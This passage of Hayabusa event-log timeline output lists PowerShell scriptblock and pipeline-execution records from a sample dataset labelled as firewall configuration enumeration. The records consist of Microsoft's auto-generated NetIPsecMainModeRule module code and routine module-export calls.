$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('Po",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"licyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetIPsecMainModeRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecMainModeRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx
2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { 
[object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType 
= 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 